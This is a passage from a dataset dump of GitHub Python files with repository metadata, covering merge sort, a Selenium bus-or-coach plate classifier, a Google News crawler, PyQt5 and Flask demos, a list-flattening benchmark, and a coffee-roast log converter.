len(left)>0:\n res = res+left\n elif len(right)>0:\n res = res+right\n return res\n\n\ndef merge_sort(arr):\n if len(arr) <= 1:\n return arr\n middle_index = len(arr)//2\n left = merge_sort(arr[:middle_index])\n right = merge_sort(arr[middle_index:])\n return merge(left, right)\n\n\nif __name__ == '__main__':\n print(merge_sort([3, 7, 4, 8, 6, 1, 5, 2, 9]))","repo_name":"orangecsy/CodeRepo","sub_path":"Python/Sort/MergeSort.py","file_name":"MergeSort.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"30179341145","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 1 14:43:45 2018\n\n@author: edward.barratt\n\"\"\"\n\nfrom collections import Counter\nimport os\nimport argparse\nfrom selenium import webdriver\nimport pandas as pd\n#from fuzzywuzzy import process\nimported_fuzzy = False # Only import fuzzywuzzy if required.\n\ntry:\n import msvcrt # Good because users do not have to press enter\n # but unavaliable outside of windows.\n gotMSVCRT = True\nexcept ImportError:\n gotMSVCRT = False\n\n\ndef getInput(text=None):\n if gotMSVCRT:\n if text is not None:\n print(text)\n r = msvcrt.getch().decode('ascii').upper()\n return r\n else:\n if text is None:\n text=''\n r = input(text)\n return r\n\n\ndef sortBusesFromCoaches(numberPlateList, baseurl='https://www.flickr.com/search/?text={}&sort=date-posted-desc',\n data=None, vehRegPlateCol=None, metaCols={}):\n \"\"\"\n Iterate through a list of registration numbers. 
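# English translation of the Chinese docstring in the merge-sort record
# above (roughly): "Purpose: merge-sort an array. Algorithm: recursive -- a
# list of length 1 is returned as-is; otherwise split into left and right
# halves, sort each recursively, then merge the two sorted sublists by
# repeatedly comparing their head elements. Input: an unsorted array, e.g.
# [3, 7, 4, 8, 6, 1, 5, 2, 9]; output: the sorted array, e.g.
# [1, 2, 3, 4, 5, 6, 7, 8, 9]. Time complexity O(n log n), space complexity
# O(1); the algorithm is stable." Note the O(1) space claim appears to be an
# error in the original: this top-down implementation allocates new sublists
# at every level, so it uses O(n) extra space.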
For each number open a browser\n showing the Flikr search results for that registration number and ask the\n user to specify what sort of vehicle it is.\n\n Returns a dictionary where each registration number has a value in either\n B (for bus), C (for coach), M (for minibus), O (for other), or U for (unknown).\n \"\"\"\n\n helpMessage = \"Use 'X' to exit programme.\"\n if (data is not None) and (len(metaCols) > 0):\n gotMeta = True\n helpMessage += \" Press 'U' (once) for meta data.\"\n else:\n gotMeta = False\n\n BCD = {'B': 'Bus', 'C': 'Coach', 'M': 'Minibus', 'O': 'Other', 'U': 'Unknown'}\n opts = list(BCD.keys())\n opts.append('X')\n busCoach = dict.fromkeys(numberPlateList, '-')\n driver = webdriver.Firefox()\n numberPlateC = Counter(numberPlateList)\n rnl = len(numberPlateC)\n for rni, (rn, N) in enumerate(numberPlateC.items()):\n if rni%10 == 0:\n print(helpMessage)\n url = baseurl.format(rn)\n BC = 'qqqq'\n while BC not in opts:\n print('{} of {} - {:>8} ({} occurrences): '.format(rni+1, rnl, rn, N), end='', flush=True)\n driver.get(url)\n print('Bus(B), Coach (C), Minibus(M), Other(O) or Unknown(U)? ', end='', flush=True)\n BC = getInput()\n BC = BC.upper()\n if BC not in opts:\n print('Input {} not understood.'.format(BC))\n if (BC == 'U') and (gotMeta):\n print('Unknown')\n print('Further Information:')\n for key, value in metaCols.items():\n print(' {}: {}'.format(key[3:-4], list(data.loc[data[vehRegPlateCol] == rn, value])[0]))\n print('Bus(B), Coach (C), Minibus(M), Other(O) or Unknown(U)? ', end='', flush=True)\n BC = getInput()\n BC = BC.upper()\n if BC in BCD.keys():\n print(BCD[BC])\n busCoach[rn] = BC\n else:\n print('Cancelled')\n break\n return busCoach\n\ndef testFromFile(inputfile=None, autoMiniBus=True,\n startNew=False, busCoachColOut='BusCoach', vehRegPlateCol='Plate',\n vehBodyCol='DVLA_VEHICLE_BODY', vehGrossWeightOCol='---',\n vehMakeOCol='---', vehModelOCol='---',\n vehUnladenWeightOCol='---', vehSeatingCapacityOCol='---',\n busBodyTypes = ['S/D BUS/COACH', 'D/D BUS/COACH', 'H/D BUS/COACH', 'MINIBUS'],\n trustPreviousDecisions=False, previousDecisionsFile=None,\n **kwargs):\n \"\"\"\n This is likely to only work on specific files.\n \"\"\"\n\n if len(kwargs):\n print('The following keyword arguments were provided and are not recognised:')\n for kwarg in kwargs.keys():\n print(kwarg)\n LocalArgs = locals()\n\n if inputfile[-4:] == '.csv':\n data = pd.read_csv(inputfile)\n else:\n data = pd.read_excel(inputfile)\n allColumns = list(data)\n metaCols = {}\n for Arg, Value in LocalArgs.items():\n if Arg[-4:] == 'OCol':\n # Check that the optional column exists.\n if Value not in allColumns:\n if not imported_fuzzy:\n from fuzzywuzzy import process\n imported_process = True\n bestOptions = process.extract(Value, allColumns, limit=5)\n posNames = \"', '\".join([x[0] for x in bestOptions])\n print((\"\\nOptional column {} does not exist in file, so will not be \"\n \"available for meta data options. You can specify another \"\n \"column using the --{} flag. 
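# testFromFile above lazily imports fuzzywuzzy only when a configured column
# is missing, then uses process.extract to suggest the five closest column
# names from the spreadsheet. That suggestion idiom in isolation (sketch):
from fuzzywuzzy import process

def suggest_columns(wanted, available, limit=5):
    # returns e.g. [('Gross Weight', 90), ('Unladen Weight', 75), ...]
    return process.extract(wanted, available, limit=limit)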
Perhaps one of the \"\n \"following is appropriate: '{}'.\").format(Value, Arg, posNames))\n else:\n metaCols[Arg] = Value\n elif Arg[-3:] == 'Col':\n # Check that the required column exists.\n if Value not in allColumns:\n if not imported_fuzzy:\n from fuzzywuzzy import process\n imported_process = True\n bestOptions = process.extract(Value, allColumns, limit=5)\n posNames = '\", \"'.join([x[0] for x in bestOptions])\n raise ValueError(('Column {} does not exist in file, specify another '\n 'column using the --{} flag. Perhaps one of the '\n 'following is appropriate: \"{}\".').format(Value, Arg, posNames))\n\n print('{} records, {} unique registration plates.'.format(len(data.index), len(data[vehRegPlateCol].unique())))\n data_NB = data.loc[~data[vehBodyCol].isin(busBodyTypes)]\n if len(data_NB.index) > 0:\n print((\"{} records removed due to unrecognised body types. Set \"\n \"'--busBodyTypes' if any need to be accepted.\").format(len(data_NB.index)))\n print(data_NB[vehBodyCol].unique())\n print('Removed vehicle body types: {}.'.format(', '.join([str(x) for x in data_NB[vehBodyCol].unique()])))\n data = data.loc[data[vehBodyCol].isin(busBodyTypes)]\n print('{} records remaining, {} unique registration plates.'.format(len(data.index), len(data[vehRegPlateCol].unique())))\n\n data_orig = data.copy()\n\n BC_already = {}\n if trustPreviousDecisions:\n BC_already = getPreviousDecisions(previousDecisionsFile)\n regplates = BC_already.keys()\n regplatesnew = data[vehRegPlateCol].unique()\n BC_already = {r: BC_already[r] for r in regplates if r in regplatesnew}\n data_already = data.loc[data[vehRegPlateCol].isin(regplates)]\n data = data.loc[~data[vehRegPlateCol].isin(regplates)]\n print('{} already catagorised.'.format(len(data_already[vehRegPlateCol].unique())))\n\n if autoMiniBus:\n if vehGrossWeightOCol not in allColumns:\n print((\"The normally optional column {} is required when --autoMiniBus \"\n \"is set to True.\").format(vehGrossWeightOCol))\n\n data_minibus = data.loc[(data[vehBodyCol] == 'MINIBUS') &\n (data[vehGrossWeightOCol] <= 3501)]\n data = data.loc[(data[vehBodyCol] != 'MINIBUS') |\n (data[vehGrossWeightOCol] > 3501)]\n BC_minibus = dict.fromkeys(list(data_minibus[vehRegPlateCol]), 'M')\n print('{} automatically catagorised as minibuses.'.format(len(data_minibus.index)))\n else:\n BC_minibus = {}\n\n print('{} records remaining. {} unique registration numbers.'.format(len(data.index), len(set(data[vehRegPlateCol]))))\n if len(data.index) > 0:\n BC_rest = sortBusesFromCoaches(list(data[vehRegPlateCol]), data=data, vehRegPlateCol=vehRegPlateCol, metaCols=metaCols)\n else:\n BC_rest = {}\n\n print('Processing Complete.')\n yn = input('Update previously assigned values? 
[y/n]')\n if yn[0].upper() == 'Y':\n updatePreviousDecisions(previousDecisionsFile, {**BC_rest, **BC_already})\n\n BC = {**BC_already, **BC_minibus, **BC_rest}\n #for key, value in BC.items():\n # print(key, value)\n data_orig[busCoachColOut] = data_orig.apply(lambda row: BC[row[vehRegPlateCol]], axis=1)\n\n savepath, savefile = os.path.split(inputfile)\n savefile, _ = os.path.splitext(savefile)\n if savefile[-3:] != '_BC':\n savefile = os.path.join(savepath, savefile+'_BC')\n else:\n savefile = os.path.join(savepath, savefile)\n tn = 0\n while os.path.exists(savefile+'.csv'):\n tn += 1\n savefile = savefile+'{}'.format(tn)\n savefile = savefile+'.csv'\n print('Results saved in {}.'.format(savefile))\n data_orig.to_csv(savefile)\n\ndef getPreviousDecisions(file, includeCity=False):\n prevDataDF = pd.read_csv(file)\n prevData = {}\n if includeCity:\n for ri, row in prevDataDF.iterrows():\n prevData[row['Plate'].replace(' ', '')] = {'BC': row['BusCoach'], 'City': row['City'].split(', ')}\n else:\n for ri, row in prevDataDF.iterrows():\n prevData[row['Plate'].replace(' ', '')] = row['BusCoach']\n return prevData\n\ndef updatePreviousDecisions(file, BC_new):\n\n cityName = input('What city name would you like to assign to the new records?')\n prevData = getPreviousDecisions(file, includeCity=True)\n gotReg = prevData.keys()\n for reg, value in BC_new.items():\n if value not in ['B', 'C']:\n continue\n if reg in gotReg:\n prevData[reg]['BC'] = value\n prevData[reg]['City'].append(cityName)\n prevData[reg]['City'] = list(set(prevData[reg]['City']))\n else:\n prevData[reg] = {'BC': value, 'City': [cityName]}\n prevDataDF = pd.DataFrame(columns=['Plate', 'BusCoach', 'City'])\n for reg, value in prevData.items():\n prevDataDF = prevDataDF.append(pd.DataFrame([[reg, value['BC'], ', '.join(value['City'])]], columns=['Plate', 'BusCoach', 'City']))\n prevDataDF.to_csv(file, index=False)\n print('Previous decision file updated.')\n\nif __name__ == '__main__':\n\n desc = \"\"\"\n A tool that helps the user to decide whether a particular registration\n number belongs to a bus or a coach.\n \"\"\"\n parser = argparse.ArgumentParser(description=desc)\n parser.add_argument('inputfile', metavar='input file',\n type=str,\n help=(\"The file to process. This should be either an excel \"\n \"file or a csv file. At a minimum the file should \"\n \"contain a column or registration numbers. If the \"\n \"string 'TEST' is supplied then a small set of test \"\n \"registration numbers will be used to illustrate how \"\n \"the tool works.\"))\n\n parser.add_argument('--vehRegPlateCol', metavar='vehicle registration plate column name',\n type=str, nargs='?', default='PLATE',\n help=(\"The column name for the vehicle registration \"\n \"plate. Default 'PLATE'.\"))\n parser.add_argument('--busCoachColOut', metavar='bus or coach column name',\n type=str, nargs='?', default='BusCoach',\n help=(\"The name of the column that will be appended to \"\n \"the input file, holding the values determining \"\n \"bus form coach. Default 'BusCoach'.\"))\n parser.add_argument('--vehBodyCol', metavar='vehicle body type column name',\n type=str, nargs='?', default='Body',\n help=(\"The column name for the vehicle body type. \"\n \"Default 'Body'.\"))\n parser.add_argument('--vehGrossWeightOCol', metavar='vehicle gross weight column name',\n type=str, nargs='?', default='Gross Weight',\n help=(\"The column name for the vehicle gross weight. Optional. 
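# updatePreviousDecisions above grows a DataFrame with DataFrame.append
# inside a loop; append re-copies the frame on every call and was deprecated
# in pandas 1.4 (removed in 2.0). Building the rows first and constructing
# the frame once is the usual replacement (sketch):
import pandas as pd

def decisions_to_frame(prev_data):
    rows = [
        {"Plate": reg, "BusCoach": v["BC"], "City": ", ".join(v["City"])}
        for reg, v in prev_data.items()
    ]
    return pd.DataFrame(rows, columns=["Plate", "BusCoach", "City"])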
\"\n \"Default 'Gross Weight'.\"))\n parser.add_argument('--vehUnladenWeightOCol', metavar='vehicle unladen weight column name',\n type=str, nargs='?', default='Unladen Weight',\n help=(\"The column name for the vehicle unladen weight. Optional. \"\n \"Default 'Unladen Weight'.\"))\n parser.add_argument('--vehMakeOCol', metavar='vehicle make column name',\n type=str, nargs='?', default='Make',\n help=(\"The column name for the vehicle make. Optional. \"\n \"Default 'Make'.\"))\n parser.add_argument('--vehModelOCol', metavar='vehicle model column name',\n type=str, nargs='?', default='Model',\n help=(\"The column name for the vehicle make. Optional. \"\n \"Default 'Model'.\"))\n parser.add_argument('--vehSeatingCapacityOCol', metavar='vehicle seating capacity name',\n type=str, nargs='?', default='Seating Capacity',\n help=(\"The column name for the vehicle seating capacity. Optional. \"\n \"Default 'Seating Capacity'.\"))\n parser.add_argument('--autoMiniBus', metavar='detect minibuses automatically',\n type=bool, nargs='?', default=True,\n help=(\"If True, vehicles with a gross weight of 3500 kg \"\n \"or less will be automatically assigned as \"\n \"minibuses. If True, then an appropriate column \"\n \"must be specified for --vehGrossWeightOCol. Default \"\n \"True.\"))\n defaultbusBodyTypes = ['S/D BUS/COACH', 'D/D BUS/COACH', 'H/D BUS/COACH', 'MINIBUS']\n parser.add_argument('--busBodyTypes', metavar='bus or coach body classes',\n type=str, nargs='*', default=defaultbusBodyTypes,\n help=(\"Vehicle body classes that are considered to \"\n \"represent vehicles that are either buses or coaches. \"\n \"Default '{}'.\").format(\"', '\".join(defaultbusBodyTypes)))\n parser.add_argument('--trustPreviousDecisions', metavar='trust previous decisions',\n type=bool, nargs='?', default=True,\n help=(\"Will automatically assign the bus/coach value \"\n \"that was previously assigned by a previous \"\n \"operation. Default True.\"))\n parser.add_argument('--previousDecisionsFile', metavar='previous decisions file',\n type=str, nargs='?', default='gotAlready.csv',\n help=(\"File to use for the previous decisions. 
Default \"\n \"is the 'gotAlready.csv' file included.\"))\n\n # More parameters to be added as needed.\n pargs = parser.parse_args()\n pargs = vars(pargs)\n\n if pargs['inputfile'] == 'TEST':\n rns = ['SK07CAA', 'SK07CAE', 'SK07CAO', 'SK07CAU', 'SK07CAV', 'SK07CAX',\n 'SK07CBF', 'SK07CBU', 'SK07CBV', 'SK07CBX', 'SK07CBY', 'SK07CCA',\n 'SK07CAA', 'SK07CAE', 'SK07CAO', 'SK07CAU', 'SK07CAA', 'SK07CAE']\n print('Running with test dataset.')\n BCs = sortBusesFromCoaches(rns)\n print('Test dataset sorted as follows:')\n for key, value in BCs.items():\n print('{}: {}'.format(key, value))\n else:\n testFromFile(**pargs)","repo_name":"OceanMetSEPA/bus-or-coach","sub_path":"busOrCoach.py","file_name":"busOrCoach.py","file_ext":"py","file_size_in_byte":14524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"19726297117","text":"from selenium import webdriver\nimport os\nimport datetime\nfrom corpus import Corpus\n\nclass GoogleNewsURLCrawler:\n chromeDriver = None\n\n #인자1: 검색 키워드, 인자2: 한번의 검색 쿼리로 리턴할 결과들의 수\n def __init__(self, keyword = '', pageSizeToRetreive = 10):\n GoogleNewsURLCrawler.__InitializeChromeDriver()\n self.__initialize(keyword, pageSizeToRetreive)\n\n def __initialize(self, keyword, pageSizeToRetreive):\n self.pageCount = 0\n self.pageSizeToRetreive = pageSizeToRetreive\n self.keyword = keyword\n self.queryExpression = GoogleNewsURLCrawler._GetFormattedQueryExpressionForGoogleSearch(keyword)\n\n #내부 유틸(private)\n @classmethod\n def __InitializeChromeDriver(cls):\n if (cls.chromeDriver == None):\n cwd = os.getcwd()\n cls.chromeDriver = webdriver.Chrome(cwd + '/chromedriver')\n cls.chromeDriver.implicitly_wait(10)\n\n # 내부 유틸(private)\n @classmethod\n def _GetFormattedQueryExpressionForGoogleSearch(cls, keyword):\n queryExpression = ''\n\n splittedKeywords = keyword.split()\n if(1 <= len(splittedKeywords)):\n queryExpression += splittedKeywords[0]\n del splittedKeywords[0]\n\n for splittedKeyword in splittedKeywords:\n queryExpression += ('+' + splittedKeyword)\n\n return queryExpression\n\n # 내부 유틸(private)\n @classmethod\n def _getNextSearchURL(cls, queryExpression, pageCount, pageSizeToRetreive):\n return 'https://www.google.com/search?q={}&start={}&tbm=nws&num={}&hl=en'.format(queryExpression, pageCount, pageSizeToRetreive)\n\n @classmethod\n def _GetToday(cls):\n return \"{:%b %d, %Y}\".format(datetime.datetime.today())\n\n #다음 크롤링 결과를 얻어옴\n def next(self):\n urls = []\n\n searchURL = GoogleNewsURLCrawler._getNextSearchURL(self.queryExpression, self.pageCount, self.pageSizeToRetreive)\n self.pageCount += self.pageSizeToRetreive\n\n GoogleNewsURLCrawler.chromeDriver.get(searchURL)\n searchResults = GoogleNewsURLCrawler.chromeDriver.find_elements_by_class_name('_hJs')\n\n for searchResult in searchResults:\n try:\n link = searchResult.find_element_by_tag_name('h3').find_element_by_tag_name('a').get_attribute('href')\n date = searchResult.find_element_by_class_name('slp').find_element_by_class_name('_QHs').get_attribute('innerText')\n if date.find('ago') != -1:\n date = GoogleNewsURLCrawler._GetToday()\n\n urls.append((link, date))\n except Exception as errorMessage:\n print(errorMessage)\n continue\n\n corpora = []\n for url in urls:\n try:\n GoogleNewsURLCrawler.chromeDriver.get(url[0])\n terms = ''\n\n try:\n for element in GoogleNewsURLCrawler.chromeDriver.find_element_by_tag_name('body').find_elements_by_xpath(\".//*\"):\n if (element.tag_name != 'style') and (element.tag_name != 'script'):\n import re\n try:\n 
innerText = element.get_attribute('innerText')\n if innerText != None:\n tokens = list(filter(lambda element: (element != None) and (element != ''),\n re.split(r'\\s+|\\t+|\\n+|,|:|;|\\.', innerText)))\n for token in tokens:\n terms += (token + ' ')\n\n except Exception as ex:\n print('exception: ' + ex + 'exception text: ' + innerText)\n print('\\n')\n print('\\n')\n continue\n\n except Exception:\n continue\n\n corpora.append(Corpus(self.keyword, url[1], url[0], terms))\n except Exception:\n continue\n\n return corpora\n\n #크롤링 조건을 리셋하여 다시 검색\n #인자1: 검색 키워드, 인자2: 한번의 검색 쿼리로 리턴할 결과들의 수\n def reset(self, keyword, pageSizeToRetreive):\n self.__initialize(keyword, pageSizeToRetreive)\n\n\n#예제\n# def updateDataBase(keyword, page):\n# googleNewsURLCrawler = GoogleNewsURLCrawler(keyword, page)\n#\n# resultPage = googleNewsURLCrawler.next()\n# for result in resultPage:\n# result.save()\n#\n# updateDataBase('MSFT', 10)\n\n\n","repo_name":"cloudinertia/coin_predict","sub_path":"src/google_news_url_crawler.py","file_name":"google_news_url_crawler.py","file_ext":"py","file_size_in_byte":4687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"72871235192","text":"# 0. 导入需要的包和模块\nfrom PyQt5.Qt import *\nimport sys\n\n\n# class Label(QLabel):\n# def mousePressEvent(self, evt) -> None:\n# # QMouseEvent\n# if evt.button() == Qt.LeftButton:\n# self.setStyleSheet(\"background-color: red\")\n\nclass Window(QWidget):\n def mousePressEvent(self, evt) -> None:\n # QMouseEvent\n local_x = evt.localPos().x()\n local_y = evt.localPos().y()\n sub_widget = self.childAt(local_x, local_y)\n if sub_widget is not None:\n sub_widget.setStyleSheet(\"background-color: red\")\n\n\n# 1. 创建一个应用程序对象\napp = QApplication(sys.argv)\n\n# 2. 控件的操作\n# 2.1 创建控件\nwindow = Window()\n# 2.2 设置控件\nwindow.setWindowTitle(\"父子关系-案例\")\nwindow.resize(500, 500)\n\nfor i in range(10):\n label = QLabel(window)\n label.move(40 * i, 40 * i)\n label.setText(f\"标签{i}\")\n\n# 2.3 展示控件\nwindow.show()\n\n# 应用程序执行,进入消息循环\nsys.exit(app.exec_())\n","repo_name":"dongsen2019/pyqt5","sub_path":"04-QWidget-父子关系-案例ds.py","file_name":"04-QWidget-父子关系-案例ds.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"29401465904","text":"from timeit import timeit\n\nimport flatten # noqa\n\nSIZE = 1000\nTO_MS = 1000\nNUM = 10\nFUNCTIONS = [\n \"flatten_extend\",\n \"flatten_concatenation\",\n \"flatten_comprehension\",\n \"flatten_chain\",\n \"flatten_reduce_lambda\",\n \"flatten_reduce_add\",\n \"flatten_reduce_concat\",\n \"flatten_reduce_iconcat\",\n \"flatten_sum\",\n]\n\nmatrix = [list(range(SIZE))] * SIZE\n\nresults = {\n func: timeit(f\"flatten.{func}(matrix)\", globals=globals(), number=NUM)\n for func in FUNCTIONS\n}\n\nprint(f\"Time to flatten a {SIZE}x{SIZE} matrix (in milliseconds):\\n\")\n\nfor func, time in sorted(results.items(), key=lambda result: result[1]):\n print(f\"{func + '()':.<30}{time * TO_MS / NUM:.>7.2f} ms\")\n","repo_name":"realpython/materials","sub_path":"python-flatten-list/performance.py","file_name":"performance.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":4481,"dataset":"github-code","pt":"95"} +{"seq_id":"16677975674","text":"from ..model.user import User, UserInf\nfrom ..model.Recipe import Recipe, Ingredient,IGD_category\nfrom flask import make_response, jsonify\nfrom .. 
import *\nfrom sqlalchemy import and_, or_\nimport json\nfrom ..util.token import TOKEN\nfrom collections import defaultdict\n\n\ndef process_search_igd(request):\n igd_info = json.loads(request.data)\n igd_name = \"%{}%\".format(igd_info['igd_name'])\n igd = Ingredient.query.filter(Ingredient.igd_name.like(igd_name)).all()\n\n return igd\n\n\ndef process_search_igd_list(request):\n igd_info = json.loads(request.data)\n igd_name_list = igd_info['igd_name'].split(',')\n\n igd_list = Ingredient.query.filter(Ingredient.igd_name.in_(igd_name_list)).all()\n return igd_list\n\ndef process_Search_recipe(request):\n igd_info = json.loads(request.data)\n igd_name_list = igd_info['igd_name'].split(',')\n R_category = igd_info['R_category']\n if R_category is None:\n R_category = ['breakfast','lunch','dinner','dessert','else']\n # print('R_category',R_category)\n # print('igd_name_list',igd_name_list)\n igd_list = Ingredient.query.filter(Ingredient.igd_name.in_(igd_name_list)).all()\n # print('igd_list_db',igd_list)\n R_id_dict= defaultdict(int)\n for igd in igd_list:\n # print(\"cur igd\",igd.igd_name)\n R_list = igd.Recipe\n # print(R_list)\n for R in R_list:\n # print(R.R_name)\n if R.R_category in R_category:\n R_id_dict[R]+=1\n response_sorted = sorted(R_id_dict.items() ,key = lambda x:x[1],reverse=True)\n # print(response_sorted)\n response_sorted = [x for x,y in response_sorted]\n\n # print(response_sorted)\n # R = Recipe.query.join(test.Recipe)\n # print(R)\n # R_list = Recipe.query.filter(and_(Recipe.R_category == R_category,Recipe.Ingredient.igd_name.in_(igd_name_list))).all()\n # return R_list\n\n return response_sorted\n\ndef process_search_category_igd(request):\n igd_info = json.loads(request.data)\n igb_category = igd_info['igd_category']\n\n if igb_category is None:\n return None\n\n igd_list = IGD_category.query.filter(IGD_category.igd_category_name==igb_category).first().Ingredient\n print(igd_list)\n\n\n return igd_list\n","repo_name":"Nicky-Lee/SpacemaneCooking","sub_path":"main/server/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"42577502854","text":"from flask import Flask, render_template, request, redirect, url_for, abort\r\nimport json\r\n\r\napp = Flask(__name__)\r\n\r\nimport sys\r\nsys.path.append(\".\")\r\nsys.path.append(\"..\")\r\n\r\nimport argparse\r\nfrom PIL import Image, ImageOps\r\nimport numpy as np\r\nimport base64\r\nimport cv2\r\nfrom inference import demo\r\n\r\ndef Base64ToNdarry(img_base64):\r\n img_data = base64.b64decode(img_base64)\r\n img_np = np.fromstring(img_data, np.uint8)\r\n src = cv2.imdecode(img_np, cv2.IMREAD_ANYCOLOR)\r\n\r\n return src\r\n\r\ndef NdarrayToBase64(dst):\r\n result, dst_data = cv2.imencode('.png', dst)\r\n dst_base64 = base64.b64encode(dst_data)\r\n\r\n return dst_base64\r\n\r\nparser = argparse.ArgumentParser(description='User controllable latent transformer')\r\nparser.add_argument('--checkpoint_path', default='pretrained_models/latent_transformer/cat.pt')\r\nargs = parser.parse_args()\r\n\r\ndemo = demo(args.checkpoint_path)\r\n\r\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\r\n#@auth.login_required\r\ndef init():\r\n if request.method == \"GET\":\r\n input_img = demo.run()\r\n input_base64 = \"data:image/png;base64,\"+NdarrayToBase64(input_img).decode()\r\n return render_template(\"index.html\", filepath1=input_base64, canvas_img=input_base64, result=True)\r\n if request.method == 
\"POST\":\r\n if 'zi' in request.form.keys():\r\n input_img = demo.move(z=-0.05)\r\n elif 'zo' in request.form.keys():\r\n input_img = demo.move(z=0.05)\r\n elif 'u' in request.form.keys():\r\n input_img = demo.move(y=-0.5, z=-0.0)\r\n elif 'd' in request.form.keys():\r\n input_img = demo.move(y=0.5, z=-0.0)\r\n elif 'l' in request.form.keys():\r\n input_img = demo.move(x=-0.5, z=-0.0)\r\n elif 'r' in request.form.keys():\r\n input_img = demo.move(x=0.5, z=-0.0)\r\n else:\r\n input_img = demo.run()\r\n \r\n input_base64 = \"data:image/png;base64,\"+NdarrayToBase64(input_img).decode()\r\n return render_template(\"index.html\", filepath1=input_base64, canvas_img=input_base64, result=True)\r\n\r\n@app.route('/zoom', methods=[\"POST\"])\r\ndef zoom_func():\r\n \r\n dz = json.loads(request.form['dz'])\r\n sx = json.loads(request.form['sx'])\r\n sy = json.loads(request.form['sy'])\r\n stop_points = json.loads(request.form['stop_points'])\r\n \r\n input_img = demo.zoom(dz,sxsy=[sx,sy],stop_points=stop_points)\r\n input_base64 = \"data:image/png;base64,\"+NdarrayToBase64(input_img).decode()\r\n res = {'img':input_base64}\r\n return json.dumps(res)\r\n\r\n@app.route('/translate', methods=[\"POST\"])\r\ndef translate_func():\r\n \r\n dx = json.loads(request.form['dx'])\r\n dy = json.loads(request.form['dy'])\r\n dz = json.loads(request.form['dz'])\r\n sx = json.loads(request.form['sx'])\r\n sy = json.loads(request.form['sy'])\r\n stop_points = json.loads(request.form['stop_points'])\r\n zi = json.loads(request.form['zi'])\r\n zo = json.loads(request.form['zo'])\r\n\r\n input_img = demo.translate([dx,dy],sxsy=[sx,sy],stop_points=stop_points,zoom_in=zi,zoom_out=zo)\r\n input_base64 = \"data:image/png;base64,\"+NdarrayToBase64(input_img).decode()\r\n res = {'img':input_base64}\r\n return json.dumps(res)\r\n\r\n@app.route('/changestyle', methods=[\"POST\"])\r\ndef changestyle_func():\r\n input_img = demo.change_style()\r\n input_base64 = \"data:image/png;base64,\"+NdarrayToBase64(input_img).decode()\r\n res = {'img':input_base64}\r\n return json.dumps(res)\r\n\r\n@app.route('/reset', methods=[\"POST\"])\r\ndef reset_func():\r\n input_img = demo.reset()\r\n input_base64 = \"data:image/png;base64,\"+NdarrayToBase64(input_img).decode()\r\n res = {'img':input_base64}\r\n return json.dumps(res)\r\n \r\nif __name__ == \"__main__\":\r\n app.run(debug=False, host='0.0.0.0', port=8000)","repo_name":"endo-yuki-t/UserControllableLT","sub_path":"interface/flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":3761,"program_lang":"python","lang":"en","doc_type":"code","stars":273,"dataset":"github-code","pt":"95"} +{"seq_id":"71807788154","text":"#! 
/usr/bin/env python3\n\nimport argparse\nimport csv\nimport datetime\nimport json\nimport os\nimport sys\n\n#\n# Roastime control codes.\n#\ncodes_by_control = {\n 'power': 0,\n 'fan': 1,\n 'drum': 2,\n}\n\ncontrols_by_code = {v:k for k,v in codes_by_control.items()}\n\n\n#\n# Roast fields for sample arrays.\n#\nroast_sample_fields = [\n 'beanDerivative',\n 'beanTemperature',\n 'drumTemperature',\n]\n\n\n#\n# Functions for computing event fields.\n#\ndef make_get_sample(index_field):\n '''\n Get a sampled field at an index.\n '''\n\n def get_sample(roast_json, source_field):\n try:\n index = min(roast_json[index_field], len(roast_json[source_field]) - 1)\n return roast_json[source_field][index]\n except:\n raise\n sys.stderr.write(f'failed to get sample {source_field} using index field {index_field}\\n')\n return None\n\n return get_sample\n\n\ndef make_get_control(control):\n '''\n Get a control value at an index.\n '''\n\n control_code = codes_by_control[control]\n def get_control(roast_json, source_field):\n current_value = None\n index_value = roast_json[source_field]\n\n try:\n action_times = roast_json['actions']['actionTimeList']\n for action in action_times:\n if action['ctrlType'] != control_code:\n continue\n\n if action['index'] > index_value:\n return current_value\n\n current_value = action['value']\n\n if current_value is not None:\n return current_value\n\n sys.stderr.write(f'index value {index_value} not within control range\\n')\n return None\n except:\n sys.stderr.write(f'failed to get control {control} using index field {source_field}\\n')\n raise\n return None\n\n return get_control\n\n\ndef make_conversion(conversion_type):\n '''\n Coerce a roast field to a specific type.\n '''\n\n def conversion(roast_json, source_field):\n value = roast_json[source_field]\n return None if value is None else conversion_type(value)\n\n return conversion\n\n\ndef seconds_from_index(roast_json, source_field):\n '''\n Convert an index field to a time value in seconds.\n '''\n\n try:\n return roast_json[source_field] / roast_json['sampleRate']\n except:\n sys.stderr.write(f'failed to get convert {source_field} to time value\\n')\n return None\n\n\n#\n# Set up basic fields.\n#\nroast_fields = [\n {'fields': ['dateTime'], 'mapped_field': ('date', lambda roast_json, source_field: datetime.datetime.fromtimestamp(roast_json[source_field] / 1000).strftime('%Y-%m-%d')) },\n {'fields': ['dateTime'], 'mapped_field': ('time', lambda roast_json, source_field: datetime.datetime.fromtimestamp(roast_json[source_field] / 1000).strftime('%H:%M:%S')) },\n\n 'dateTime',\n 'uid',\n 'roastNumber',\n 'roastName',\n 'beanId',\n 'rating',\n\n 'serialNumber',\n 'firmware',\n 'hardware',\n\n {'fields': ['ambient', 'ambientTemp'], 'mapped_field': ('ambient', make_conversion(float))},\n {'fields': ['humidity', 'roomHumidity'], 'mapped_field': ('humidity', make_conversion(float))},\n {'fields': ['weightGreen'], 'mapped_field': ('weightGreen', make_conversion(float))},\n {'fields': ['weightRoasted'], 'mapped_field': ('weightRoasted', make_conversion(float))},\n\n 'preheatTemperature',\n 'beanChargeTemperature',\n 'beanDropTemperature',\n 'drumChargeTemperature',\n 'drumDropTemperature',\n \n 'totalRoastTime',\n 'sampleRate',\n 'roastStartIndex',\n 'indexYellowingStart',\n 